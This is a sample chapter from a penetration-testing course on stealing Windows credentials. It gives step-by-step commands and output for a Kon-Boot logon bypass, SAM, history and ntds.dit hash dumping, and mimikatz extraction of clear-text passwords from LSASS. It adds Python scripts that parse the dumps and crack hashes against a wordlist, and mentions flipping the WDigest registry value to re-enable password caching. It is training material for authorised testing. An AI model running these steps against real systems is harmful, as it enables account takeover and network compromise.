WARNING! Sample chapter - The materials in this sample chapter are selected from the advanced penetration testing course at https://training.zdresearch.com - We hope you enjoy it!

Obtaining Windows Passwords
• Now that you know about pass-the-hash and how Windows hashing works, let's look at some attack scenarios.
• Assume we are inside a network that uses a domain controller to manage its resources and users.

Obtaining Windows Passwords
• As a reminder, let's take a quick look at how Active Directory works again.

Obtaining Windows Passwords
• Now let's go through the scenarios we can use to obtain NT and LM hashes for pass-the-hash attacks:
1 - Physical attack and password bypass
2 - Dumping NT and LM hashes from the SAM database
3 - Dumping Windows passwords from the password history
4 - Dumping passwords and hashes from logon sessions
5 - Dumping hashed passwords from the Domain Controller

Physical attack and password bypass
• In the first scenario we have physical access to the system. So how can we log in to a password-protected system?
• The answer is very easy: Windows itself offers no protection against physical-access attacks (only full-disk encryption such as BitLocker stops them).
• You can boot any live disk, from USB or CD, and modify the SAM database in \Windows\System32\config.
• The problem with this method is that the user will notice it when you have changed their password or added a completely new user.
• So what is the solution?

Physical attack and password bypass
• Use Kon-Boot. You can buy it for $15 at http://www.piotrbania.com/all/kon-boot/
• Kon-Boot applies a temporary, in-memory patch to the kernel, so you can log in as any local user without the password.
• Do your job and restart the system: the patch lives only in memory, so the original password still works afterwards.
• So you have done a fully stealthy attack!
• Note that the patch only bypasses the logon check; it does not reveal the password itself, so combine it with a hash dump if you need the credentials.

Dumping NT and LM hashes using the SAM database
• The second scenario is dumping the hashes from the SAM database.
• You need a copy of the SAM file, and by default that is not possible: Windows keeps its registry hives open and locked while it runs.
• hobocopy or Fast RAW File Copier make it possible (hobocopy reads the locked files through a Volume Shadow Copy snapshot):
  C:\hobocopyx64>HoboCopy.exe c:\Windows\System32\config c:\config-bkp
  44 files (136.92 MB, 1 directories) copied, 0 files skipped

Dumping NT and LM hashes using the SAM database
• Now you can use creddump on your BackTrack/Kali machine to extract the hashes from the copied hives:
  root@bt:/pentest/passwords/creddump# ./pwdump.py /root/SYSTEM /root/SAM
  Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
• Each output line is user:RID:LM hash:NT hash:::, the classic pwdump format.
• Note the SYSTEM file here: this is the system hive, which also holds the SYSKEY (boot key) used to encrypt the hashes stored in the SAM, so you need both files to recover them.

Dumping Windows passwords from password history
• In networks with more than 10 users you may be out of luck if you only look at the local SAM file, because domain accounts are not stored in it.
• But depending on how the DC is configured, we may be able to use certain situations to attack the host machine.
• One of the main situations is the password history feature.

Dumping Windows passwords from password history
• The "Enforce password history" policy will not let a user reuse any of their last X passwords.
• For example, if your password was 12345, your next password after it expires cannot be 12345 again.
• To enforce this, Windows keeps the hashes of the old passwords, and a very cool tool called Quarks PwDump can dump them (-dhl dumps the local hashes, --hist includes the history):
  C:\>QuarksPwDump.exe -dhl --hist
  Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
  Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
  Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::
• Note that _hist0 repeats the current hash, and that all three LM hashes end in AAD3B435B51404EE, the LM value of an empty 7-byte half: every one of these passwords is 7 characters or shorter.

Dumping passwords and hashes from logon sessions
• We are still not done! We have more very cool methods for obtaining Windows passwords.
• Windows keeps every successful login in memory (inside the LSASS process) and calls it a logon session.
• The information in memory includes the username, the domain or workgroup, and the LM:NT hashed password.
• This is not only about interactive GUI logins; a logon session is also created by:
• RDP logins
• the RunAs feature
• every API call that takes credentials, such as CreateProcessWithLogonW
• etc.

Dumping passwords and hashes from logon sessions
• To extract logon sessions, as you know, you need a privileged user (a local administrator who can enable SeDebugPrivilege, or SYSTEM).
• For this task we will use the French tool mimikatz: http://blog.gentilkiwi.com
• The tool extracts the passwords by injecting a DLL called sekurlsa.dll into the lsass.exe process.
• Follow the method on the next slide to dump Windows passwords in clear text!
• Please note that you should type each command after the "mimikatz #" prompt.

Dumping passwords and hashes from logon sessions
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
…
mimikatz # @getLogonPasswords full
Authentification Id         : 0;470133
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : Sensetive-man
        msv1_0 :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Hash LM      : 44efce164ab921caaad3b435b51404ee
         * Hash NTLM    : 32ed87bdb5fdc5e9cba88547376818d4
        wdigest :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
        tspkg :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
        kerberos :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
mimikatz #
• This mimikatz 1.x build prints in French: "Demande d'ACTIVATION du privilège ... OK" means SeDebugPrivilege was enabled, "Utilisateur" is the user, "Domaine" the domain, and "Mot de passe" the clear-text password.
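To show how the output above is structured, here is an added Python example (not part of the course material and not code from mimikatz) that parses the French-labelled `@getLogonPasswords full` output of mimikatz 1.x into one record per logon session, then pulls out the pass-the-hash material from msv1_0 and every clear-text password any SSP cached. The sample text is the session printed above, embedded verbatim; the label table and regular expressions are this example's own assumptions about the layout.

```python
"""Parse mimikatz 1.x `@getLogonPasswords full` output into records.
Added example for the course slides; not code from mimikatz itself."""
import re
from collections import defaultdict

# Sample input: the logon session printed on the slide above.
SAMPLE = """\
mimikatz # @getLogonPasswords full
Authentification Id         : 0;470133
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : Sensetive-man
        msv1_0 :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Hash LM      : 44efce164ab921caaad3b435b51404ee
         * Hash NTLM    : 32ed87bdb5fdc5e9cba88547376818d4
        wdigest :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
        tspkg :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
        kerberos :
         * Utilisateur  : Administrator
         * Domaine      : Sensetive-man
         * Mot de passe : 123456
mimikatz #
"""

# French label -> field name (assumed from the 1.x output shown on the slide;
# mimikatz 2.x prints English labels, so swap this table for those builds).
LABELS = {
    "Authentification Id": "auth_id",
    "Package d'authentification": "auth_package",
    "Utilisateur principal": "user",
    "Domaine d'authentification": "domain",
    "Utilisateur": "user",
    "Domaine": "domain",
    "Hash LM": "lm",
    "Hash NTLM": "ntlm",
    "Mot de passe": "password",
}
SSP_RE = re.compile(r"^\s+(\w+)\s*:\s*$")          # "        msv1_0 :" opens an SSP block
FIELD_RE = re.compile(r"^\s*\*?\s*([^:]+?)\s*:\s*(.*)$")  # "label : value" lines


def parse_sessions(text):
    """Return one dict per logon session: session-level fields plus an 'ssp'
    dict mapping package name (msv1_0, wdigest, ...) -> {field: value}."""
    sessions, cur, ssp = [], None, None
    for line in text.splitlines():
        if line.startswith("Authentification Id"):   # a new logon session starts here
            cur = {"ssp": defaultdict(dict)}
            sessions.append(cur)
            ssp = None
        if cur is None or line.startswith("mimikatz #"):
            continue
        m = SSP_RE.match(line)
        if m:
            ssp = m.group(1)
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        field = LABELS.get(m.group(1))
        if field is None:
            continue                                  # unknown label: ignore, never guess
        if ssp is None:
            cur[field] = m.group(2).strip()
        else:
            cur["ssp"][ssp][field] = m.group(2).strip()
    return sessions


def cleartext_credentials(sessions):
    """(domain, user, password, package) for every SSP that cached a clear-text
    password: the wdigest, tspkg and kerberos entries the slides explain."""
    return [(f.get("domain"), f.get("user"), f["password"], pkg)
            for s in sessions for pkg, f in s["ssp"].items() if "password" in f]


def nt_hashes(sessions):
    """(domain, user, NT hash) from msv1_0: pass-the-hash material that is
    present even when no SSP held the clear-text password."""
    return [(s["ssp"]["msv1_0"].get("domain"), s["ssp"]["msv1_0"].get("user"),
             s["ssp"]["msv1_0"].get("ntlm")) for s in sessions if "msv1_0" in s["ssp"]]


if __name__ == "__main__":
    found = parse_sessions(SAMPLE)
    for dom, user, ntlm in nt_hashes(found):
        print(f"PTH  {dom}\\{user} NT={ntlm}")
    for dom, user, pw, pkg in cleartext_credentials(found):
        print(f"{pkg:9s}{dom}\\{user} : {pw}")
```

On a real engagement the dump contains dozens of sessions (one per service account, RDP user and RunAs); the parser keeps them separate by starting a new record at each "Authentification Id" line, so duplicates and sessions without any clear-text entry are still reported with their NT hash.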

Dumping passwords and hashes from logon sessions
• OK, so why can we get the clear-text password?
• Since Windows Vista there is a new Security Support Provider (SSP) for RDP, called TsPkg. It adds single sign-on ("remember me!") to the protocol, and to do that it keeps the user's password.
• Almost all Windows versions also have another SSP called WDigest, used for HTTP Digest authentication. Because of the way the digest challenge-response works, it keeps a clear-text copy of the password in memory so it can answer challenges.
• Caveat for newer targets: Windows 8.1/2012 R2 and later do not cache the WDigest password by default, and the KB2871997 update brings the same behaviour to Windows 7/8/2008 R2/2012 once the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 0. Setting it to 1 re-enables caching, which is why attackers flip it and defenders should alert on that change.

Dumping passwords and hashes from logon sessions
• The msv1_0 package, which LSASS uses for NTLM authentication to the domain, holds only the LM and NT hashes, as the output above shows; on these Windows versions the Kerberos package also keeps the clear-text password, so you get it from there as well.
• In the following figure you can see the SSP settings of a Windows 7 machine.

Dumping hashed passwords from the Domain Controller
• OK, we are at the last method in our Windows password dumping journey.
• By now you should easily understand that you can find a domain administrator's password in your host's memory, if one has logged on to it.
• So you connect to your DC using RDP. If you look at its SAM file, all you get are the local accounts of the DC machine, not the domain users.
• To get the password hashes of all domain users you have to go to \Windows\NTDS, where the Active Directory database ntds.dit lives. Like the SAM, it is locked while the DC runs, so copy it through a shadow copy the same way, together with the DC's SYSTEM hive.

Dumping hashed passwords from the Domain Controller
• To accomplish this we need two tools: libesedb and the creddump we used before.
• http://sourceforge.net/projects/libesedb/
• http://code.google.com/p/creddump/
• First compile libesedb, then extract the hash table from ntds.dit into the NTDS.export directory inside the same program directory:
  # cd libesedb
  # chmod +x configure
  # ./configure && make
  # cd esedbtools
  # ./esedbdumphash ../ntds.dit
• Now you can use creddump to dump the passwords; remember you need the DC's SYSTEM hive:
  root@bt:~/creddump# python dsdump.py ../SYSTEM ../NTDS.export/datatable
  Administrator:500:NO PASSWORD***********:031F8E5A76932FC5CC7431680ADAE4EC:::
• The LM field shows NO PASSWORD because domain controllers from Windows Server 2008 onward do not store LM hashes by default; the NT hash is still there for pass-the-hash.
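All three dumps on these slides (pwdump.py from the SAM, Quarks PwDump with --hist, and dsdump.py from ntds.dit) print the same pwdump format, user:RID:LM:NT:::. The following Python script is an added example, not code from the course or from any of those tools: it parses such lines, computes NT hashes itself (MD4 over UTF-16LE, implemented inline because hashlib's md4 is disabled in many OpenSSL 3 builds), and flags what a tester checks first: stored LM hashes, passwords of 7 characters or fewer (readable from the LM structure alone), empty passwords, wordlist hits, and reuse across history slots or accounts. The Administrator lines are the ones from the Quarks PwDump slide; the Guest and bob lines, the wordlist, and the _hist naming rule are this example's own constructions and assumptions.

```python
"""Triage pwdump-format lines (user:RID:LM:NT:::) as printed by creddump's
pwdump.py, Quarks PwDump --hist and creddump's dsdump.py.
Added example for the course slides; not code from any of those tools."""
import re
import struct
from collections import defaultdict

EMPTY_LM_HALF = "aad3b435b51404ee"              # LM of an empty 7-byte half
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM not stored / disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4("") = NT of empty password
HIST_RE = re.compile(r"^(.+)_hist(\d+)$")       # history naming, assumed from the slide


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable)."""
    M = 0xFFFFFFFF
    rol = lambda x, s: ((x << s) | (x >> (32 - s))) & M
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    st = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = st
        for i in range(16):                                   # round 1
            a = rol((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        st = [(s + v) & M for s, v in zip(st, (a, b, c, d))]
    return struct.pack("<4I", *st)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the password encoded as UTF-16LE, lower-case hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text):
    """One dict per line. LM placeholders such as 'NO PASSWORD****' (what
    dsdump.py prints when the DC stores no LM hash) become EMPTY_LM."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[:4]
        m = HIST_RE.match(user)                  # Administrator_hist1 -> (Administrator, 1)
        base, slot = (m.group(1), int(m.group(2))) if m else (user, None)
        lm, nt = lm.lower(), nt.lower()
        if not re.fullmatch(r"[0-9a-f]{32}", lm):
            lm = EMPTY_LM
        rows.append({"user": user, "base": base, "slot": slot, "rid": int(rid), "lm": lm, "nt": nt})
    return rows


def triage(rows, wordlist):
    """Map each dumped name to the list of weaknesses found for it."""
    by_nt = {nt_hash(w): w for w in wordlist}
    findings = defaultdict(list)
    for r in rows:
        if r["lm"] != EMPTY_LM:
            findings[r["user"]].append("LM hash stored")
            if r["lm"][16:] == EMPTY_LM_HALF:    # second DES half is empty
                findings[r["user"]].append("password <= 7 chars")
        if r["nt"] == EMPTY_NT:
            findings[r["user"]].append("empty password")
        elif r["nt"] in by_nt:
            findings[r["user"]].append("cracked: " + by_nt[r["nt"]])
    # Reuse: one NT hash under several accounts or history slots. Quarks repeats
    # the current hash as _hist0 (see the slide), so that pair is collapsed first.
    owners = defaultdict(set)
    for r in rows:
        owners[r["nt"]].add(r["base"] if r["slot"] in (None, 0) else r["user"])
    for nt, names in owners.items():
        if len(names) > 1 and nt != EMPTY_NT:
            for n in names:
                findings[n].append("same password as " + ", ".join(sorted(names - {n})))
    return dict(findings)


# Input: the Administrator lines from the Quarks PwDump slide, plus three constructed
# lines: Guest with an empty password, and a dsdump.py-style 'bob' with no LM hash
# whose old password equals the current one.
SAMPLE = "\n".join([
    "Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::",
    "Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::",
    "Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::",
    "Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::",
    "Guest:501:" + EMPTY_LM + ":" + EMPTY_NT + ":::",
    "bob:1001:NO PASSWORD*********************:" + nt_hash("123456") + ":::",
    "bob_hist1:1001:NO PASSWORD*********************:" + nt_hash("123456") + ":::",
])
WORDLIST = ["123456", "password", "Password1"]   # constructed mini wordlist

if __name__ == "__main__":
    for name, issues in triage(parse_pwdump(SAMPLE), WORDLIST).items():
        print(f"{name:22s} {'; '.join(issues)}")
```

The "7 chars or fewer" check works because LM upper-cases the password, pads it to 14 bytes and DES-encrypts each 7-byte half separately, so an empty second half always produces aad3b435b51404ee regardless of the first half. Anything not cracked by the wordlist goes to hashcat (-m 3000 for LM, -m 1000 for NT), but hashes that match across history slots or accounts are worth reporting even before cracking.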

End of sample
• Using these simple tools and tricks you can successfully and completely compromise a lot of Windows networks during your penetration tests. I hope you enjoyed the sample, and see you in the full course!!!